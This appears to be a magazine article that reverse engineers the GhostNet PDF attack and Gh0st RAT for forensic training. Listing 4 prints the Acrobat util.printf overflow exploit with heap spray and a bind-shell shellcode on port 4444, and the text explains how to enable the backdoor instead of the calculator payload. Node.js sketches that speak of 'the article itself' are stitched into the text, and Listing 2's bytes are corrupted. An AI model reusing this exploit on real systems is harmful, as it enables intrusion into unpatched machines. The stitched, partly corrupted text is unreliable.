Reverse engineering the GhostNet PDF attack

Ghost Story


How did the GhostNet attack manage to infect computers around the world? With a shot of weird PDF magic.

By Tobias "Newroot," Hans-Peter Merkel, and Markus Feilner

Jozef Dunaj, 123RF

GhostNet is a PDF hacking tool from China that has already invaded networks belonging to the Dalai Lama and many western governments. Details of the ghost attack are gradually emerging. One government agency after another has had to hesitantly admit that, yes, it has found infected computers in its offices. Organizations in Europe, the USA, Canada, and Asia have all reported intrusions launched against security-sensitive machines. The GhostNet invasion spread like cobwebs across the Internet before reaching its maximum extent at the end of 2008.

The Adobe Reader exploit that this attack used to propagate itself was fairly old at the time, but even though admins armed with security testing tools such as Metasploit [1] quickly uncovered the problem, the exploit infested a large number of PCs around the world. And if you think only newbies could fall for an executable email attachment attack, think again. The GhostNet attack has taught us the dangers of even a simple act like opening a PDF file.

GhostNet works because Acrobat Reader automatically executes embedded JavaScript code. The JavaScript can then download more complex, malicious code from the Internet. This vulnerability, which Adobe did not fix until version 8.1.3, caused infected computers to automatically open a connection to Gh0st RAT, the GhostNet command and control center (Figure 1). We tested and explored various GhostNet components as part of developing a training curriculum for crime prevention and security offices.

Investigating the source code gave us a good deal of insight into the origin of the GhostNet exploit. The C++ code was only available in Chinese at first. Of course, the language barrier made it difficult to use the menus. Figure 1 shows the Gh0st RAT Beta 3.6 control center in a later English version.

Figure 1: Attackers can use the Gh0st RAT control center to enable the webcam, keylogger, and other features at the click of a mouse.

Keylogger, Screen Grabber, Bug, and Webcam

The Gh0st RAT control center offers a number of useful functions for managing an attack, including:

  • Total access to the compromised PC: The malware can monitor both the filesystem and the screen.
  • Input devices: The internal keylogger logs Internet activity such as online banking and password entries.
  • Area monitoring: If the infected machine happens to be a laptop, the GhostNet admin can remotely enable the internal microphone and listen in on conversations in the room.

It is also possible to enable an internal or attached webcam, although this is risky for the attacker because the camera's activity LED can give the intrusion away; this feature probably wasn't used very often.

GhostNet is a role model for intuitive control, and the learning curve from first steps to criminal activity is very short, but thanks to reverse engineering, admins still have a few options for protecting themselves.

Adding JavaScript to a PDF

The story of the GhostNet attack begins with a PDF file. To follow along with this discussion, you'll need a recent Linux PC with a GUI and the Metasploit security testing framework.

To understand PDF vulnerabilities, consider the app.alert method, which is sometimes used to add alerts to PDF documents.

To begin, use the Scribus [2] desktop publishing application to create a harmless-looking PDF document that contains embedded JavaScript. After creating the normal PDF content, select Edit | Add JavaScript and add the app.alert function:

function New_Script()
{
app.alert("Hello World!");
}

After embedding the script, you then need to export the PDF. Change the No Script option in File | Export | Save as PDF | Viewer to New_Script and then save the PDF. A viewer who opens the PDF will see the message shown in Figure 2.

Figure 2: Hello World! The PDF has opened a pop-up window, courtesy of an embedded script.

Thus far, this hack might not seem so impressive, but reverse engineering the PDF content provides additional insight into how malicious code is embedded. A simple cat command shows the embedded JavaScript object (Listing 1). Line 8 contains the compressed binary data, which you then need to convert back into readable JavaScript. Using the clipboard, transfer the data between stream and endstream to a new file, which you can call hello.bin. Then run xxd, a hex dump utility, to list the bytes as a C array (Listing 2).

Listing 1: cat helloworld.pdf
01 13 0 obj
02
03 << /Length 65
04
05 /Filter /FlateDecode >>
06
07 stream
08 x[...]
09 endstream
10 endobj
11 14 0 obj
12 << /S /JavaScript /JS 13 0 R >>
13 endobj

Listing 2: xxd -i hello.bin
unsigned char hello_bin[] = {
  0x78, 0xef, 0xbf, 0xbd, 0x4b, 0x2b, 0xef, 0xbf, 0xbd, 0x4b, 0x2e, 0xef,
  0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x53, 0xef, 0xbf, 0xbd,
  0x4b, 0x2d, 0x4d, 0x2d, 0xef, 0xbf, 0xbd, 0x4e, 0x2e, 0xef, 0xbf, 0xbd,
  0x2c, 0x28, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef,
  0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x52, 0x50, 0x50, 0x48, 0x2c, 0x28, 0xef,
  0xbf, 0xbd, 0x4b, 0xef, 0xbf, 0xbd, 0x49, 0x2d, 0x2a, 0xef, 0xbf, 0xbd,
  0x50, 0xef, 0xbf, 0xbd, 0x48, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0xef,
  0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x2f, 0xef, 0xbf, 0xbd, 0x49, 0x51, 0x54,
  0xd2, 0xb4, 0xef, 0xbf, 0xbd, 0xef, 0xbf, 0xbd, 0x3f, 0xef, 0xbf, 0xbd,
  0x0a
};
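
Copying binary data through the clipboard is fragile. The repeated 0xef, 0xbf, 0xbd runs in Listing 2 are the UTF-8 encoding of U+FFFD, the replacement character, which suggests that some bytes were altered on the way into the listing. As a minimal sketch of a byte-exact alternative, the following Node.js script reads the bytes between stream and endstream directly and inflates them. Node.js is an assumption here (the article itself works with cat, xxd, and PHP), the function names are hypothetical, and the code assumes a direct numeric /Length entry and a /FlateDecode filter, as in Listing 1.

```javascript
// Sketch: pull one stream out of a PDF without going through the clipboard.
// Assumptions: direct numeric /Length, /FlateDecode filter (see Listing 1).
const zlib = require('zlib');

// Returns the raw (still compressed) bytes of the first stream found at or
// after byte offset `from`.
function extractStream(pdf, from = 0) {
  const keyword = pdf.indexOf('stream', from);
  if (keyword < 0) throw new Error('no stream keyword found');

  // Use the last /Length entry between `from` and the stream keyword.
  const header = pdf.subarray(from, keyword).toString('latin1');
  const lengths = [...header.matchAll(/\/Length\s+(\d+)/g)];
  if (lengths.length === 0) throw new Error('no direct /Length entry found');
  const length = Number(lengths[lengths.length - 1][1]);

  // The data starts after the end-of-line marker (CRLF or LF) behind the keyword.
  let start = keyword + 'stream'.length;
  if (pdf[start] === 0x0d) start += 1;
  if (pdf[start] === 0x0a) start += 1;
  return pdf.subarray(start, start + length);
}

// Inflates the zlib data that a /FlateDecode stream contains and returns text.
function inflateStream(pdf, from = 0) {
  return zlib.inflateSync(extractStream(pdf, from)).toString('utf8');
}

// Example use, starting the search at object 13 from Listing 1:
// const pdf = require('fs').readFileSync('helloworld.pdf');
// console.log(inflateStream(pdf, pdf.indexOf('13 0 obj')));
```

A real PDF usually holds several streams, so the offset passed in decides which one is decoded. The simple indexOf search for the object header is only good enough for a small test file like this one.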

Unfortunately, xxd only produces C-style hexadecimal values such as 0x90. The PHP script used for decoding needs a different notation that represents each byte in a form such as \x90. Metasploit's msfencode provides the necessary conversion:

cat hello.bin | /usr/local/framework-3.2/msfencode -e generic/none -t perl -o hello.php

To make the result executable, you only need minor changes: add the PHP tags, adjust the buffer declaration, and call the decompression function. The new hello.php file includes the byte array in the required format (Listing 3).

Listing 3: hello.php
<?php
// Bytes from hello.bin in \x notation, as written by msfencode
$buf =
"\x78\xef\xbf\xbd\x4b\x2b\xef\xbf\xbd\x4b\x2e\xef\xbf\xbd" .
"\xef\xbf\xbd\xef\xbf\xbd\x53\xef\xbf\xbd\x4b\x2d\x4d\x2d" .
"\xef\xbf\xbd\x4e\x2e\xef\xbf\xbd\x2c\x28\xef\xbf\xbd\xef" .
"\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\x52\x50\x50" .
"\x48\x2c\x28\xef\xbf\xbd\x4b\xef\xbf\xbd\x49\x2d\x2a\xef" .
"\xbf\xbd\x50\xef\xbf\xbd\x48\xef\xbf\xbd\xef\xbf\xbd\xef" .
"\xbf\xbd\xef\xbf\xbd\x2f\xef\xbf\xbd\x49\x51\x54\xd2\xb4" .
"\xef\xbf\xbd\xef\xbf\xbd\x3f\xef\xbf\xbd\x0a";

// FlateDecode data is a zlib stream, which gzuncompress() inflates
echo gzuncompress($buf);

?>
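
The notation change itself is simple: each byte becomes a backslash, an x, and two hex digits. The following Node.js sketch mimics the layout of Listing 3 with 14 bytes per line. It is not msfencode's implementation, and the function name toHexEscapes is a hypothetical helper chosen for illustration.

```javascript
// Sketch: format raw bytes as "\xNN" string literals, 14 bytes per line,
// joined with the PHP/Perl concatenation operator as in Listing 3.
function toHexEscapes(bytes, perLine = 14) {
  const lines = [];
  for (let i = 0; i < bytes.length; i += perLine) {
    // Turn each byte of this chunk into a four-character escape such as \x78.
    const chunk = Array.from(
      bytes.subarray(i, i + perLine),
      (b) => '\\x' + b.toString(16).padStart(2, '0')
    );
    lines.push('"' + chunk.join('') + '"');
  }
  return lines.join(' .\n') + ';';
}

// Example use with the file from the article:
// const data = require('fs').readFileSync('hello.bin');
// console.log('$buf =\n' + toHexEscapes(data));
```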

To evaluate this code at the command line, use php-cli (a package for php-cli is available from the Debian repository). Running php hello.php will now recreate the JavaScript code entered in Scribus:

function New_Script()
{
app.alert("Hello World!");
}

The hackers behind GhostNet, who were probably well paid by some government, used exactly these techniques to compromise Windows machines via the util.printf exploit for Acrobat Reader. A proof of concept is available [3].

The PDF document illustrates the vulnerability by means of a buffer overflow in the util.printf function. Using the same approach described in the previous example, you can use reverse engineering to analyze the embedded code by entering the command cat 2008-APSB08-19.pdf:

H??W]k?V}???A
?
?
}'T_????owg??/???Q &????H?? xh?S??av7
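
Before extracting anything from an untrusted file such as this proof of concept, a quick triage for script markers can be useful. The sketch below, written for Node.js as an assumption of convenience, counts the /JavaScript and /JS keys seen in Listing 1 plus /OpenAction and /AA, the PDF keys that attach automatic actions. The function name and the marker list are illustrative choices, not part of any existing tool.

```javascript
// Sketch: count PDF name tokens that point to scripts or automatic actions.
const MARKERS = ['/JavaScript', '/JS', '/OpenAction', '/AA'];

function countScriptMarkers(pdf) {
  // latin1 maps every byte to one character, so binary data cannot break decoding.
  const text = pdf.toString('latin1');
  const counts = {};
  for (const marker of MARKERS) {
    // A PDF name ends at whitespace or a delimiter, so /JS must not match /JSFoo.
    const pattern = new RegExp(marker + '(?=[\\s()<>\\[\\]{}/%]|$)', 'g');
    counts[marker] = (text.match(pattern) || []).length;
  }
  return counts;
}

// Example use with the proof-of-concept file from [3]:
// const pdf = require('fs').readFileSync('2008-APSB08-19.pdf');
// console.log(countScriptMarkers(pdf));
```

A count of zero is not proof of a clean file: PDF names can be written with #xx hex escapes, and objects can be stored inside compressed object streams, neither of which this sketch decodes.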

The next task is to extract the code, store it as exploit.bin, and then use Metasploit to create an opcode array. Just like hello.php, it then needs PHP tags, the buffer declaration, and the conversion function.

Listing 4 shows the JavaScript code recovered by calling php exploit.php. The listing has two arrays (shellcode1 and shellcode2), although the code only uses the first array (lines 76 and 83), which performs the harmless task of launching the calculator on a Windows system.

PHP, a Spot of JavaScript, and a Buffer Overflow

Notice the util.printf call that triggers the buffer overflow at the end of the JavaScript code (line 86) in Listing 4. The format string %45000f asks util.printf to format the huge number stored in the num variable (line 85) as a floating-point value with a field width of 45,000 characters, and this causes the buffer overflow. But an even more interesting feature of Listing 4 is the second shellcode array. All you have to do is replace shellcode1 with shellcode2 in lines 76 and 83, and the code will open a backdoor instead of launching the calculator.

The code in the second array opens TCP port 4444; you can test this by issuing a Netcat command for the port number. Patched versions of Adobe Reader are no longer vulnerable to this problem, but intruders are well aware of other bugs in Acrobat API functions.
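
The Netcat check can also be scripted. The following Node.js sketch attempts a TCP connection and reports whether it succeeded. The helper name isPortOpen and the two-second default timeout are assumptions made for illustration.

```javascript
// Sketch: report whether a TCP port accepts connections, similar to a
// manual Netcat probe of port 4444 on a test machine.
const net = require('net');

function isPortOpen(host, port, timeoutMs = 2000) {
  return new Promise((resolve) => {
    const socket = net.connect({ host, port });
    // Close the socket and report the result; later calls to resolve are ignored.
    const finish = (open) => {
      socket.destroy();
      resolve(open);
    };
    socket.setTimeout(timeoutMs);
    socket.once('connect', () => finish(true));
    socket.once('timeout', () => finish(false));
    socket.on('error', () => finish(false));
  });
}

// Example use (replace the address with that of your own test machine):
// isPortOpen('127.0.0.1', 4444).then((open) => console.log(open));
```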

Metasploit uses more than 100 different payloads to allow penetration testers to run backdoor functions or download malware. In our training session for crime fighters, we used the embedded download function to transfer our GhostNet Trojan to Windows PCs.

Incidentally, the Gh0st RAT control center automatically creates the Trojan. It makes no difference whether you use a manipulated PDF or an iframe tag on a website to compromise the PC. Metasploit uses the msfpayload program to export payloads, and these exported payloads are then converted into shellcode arrays.

Listing 4: exploit.php
01 // win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2
02 // http://metasploit.com
03 var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
04 "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
05 "%u4568%u4222%u2389%u7536%u1335%u4589%u7431%u346a" +
[...]
25 "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
26 "%u314e%u7475%u7038%u7765%u4370");
27
28 // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
29 var shellcode2 = unescape ("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
30 "%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +
31 "%u3875%u4329%u4156%u4a90%u4949%u4937%u5a67%u123a" +
[...]
70 "%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
71 "%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +
72 "%u684f%u3956%u386f%u4350");
73
74 var bigblock = unescape("%u0A0A%u0A0A");
75 var headersize = 20;
76 var slackspace = headersize + shellcode1.length;
77 while (bigblock.length < slackspace) bigblock += bigblock;
78 var fillblock = bigblock.substring(0,slackspace);
79 var block = bigblock.substring(0,bigblock.length - slackspace);
80 while (block.length + slackspace < 0x60000) block = block + block + fillblock;
81
82 var memory = new Array();
83 for (i = 0; i < 1200; i++){ memory[i] = block + shellcode1 }
84
85 var num =1299999999999999999988888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
86 util.printf("%45000f",num)
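
The unescape() strings in Listing 4 pack two bytes into each %uXXXX unit. To look at the payload in a hex viewer or disassembler, an analyst first has to turn those units back into raw bytes. The Node.js sketch below does that under the assumption that the target is a little-endian x86 Windows machine, where each 16-bit unit sits in memory with its low byte first. The function name decodePercentU is hypothetical.

```javascript
// Sketch: convert "%uXXXX" escape sequences into the bytes they occupy in
// memory on a little-endian machine (low byte of each 16-bit unit first).
function decodePercentU(text) {
  const units = text.match(/%u[0-9a-fA-F]{4}/g) || [];
  const out = Buffer.alloc(units.length * 2);
  units.forEach((unit, i) => {
    // Skip the "%u" prefix and parse the four hex digits.
    out.writeUInt16LE(parseInt(unit.slice(2), 16), i * 2);
  });
  return out;
}

// Example use with the first two units of shellcode1 in Listing 4:
// console.log(decodePercentU('%u03eb%ueb59').toString('hex'));
```

Writing the resulting buffer to a file keeps the analysis outside the PDF viewer, so nothing from the document ever runs.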

Dangerously Simple

You don't need spectacular programming skills to understand how intruders use PDFs to gain entry into vulnerable networks. Some of the most powerful exploits are hidden in innocuous places where neither experts nor end users would ever think to look.

Adobe plugged the hole that led to the GhostNet attack, but it is only a matter of time before other PDF exploits appear in the wild.

INFO
[1] Metasploit: http://www.metasploit.com
[2] Scribus: http://www.scribus.net
[3] Proof of Concept for PDF exploit: http://milw0rm.com/sploits/2008-APSB08-19.pdf

THE AUTHOR

Hans-Peter Merkel has focused on data forensics for many years as an active member of the open source community. He trains crime fighters in Germany and Tanzania and is the founder and chair of FreiOSS and Linux4Afrika.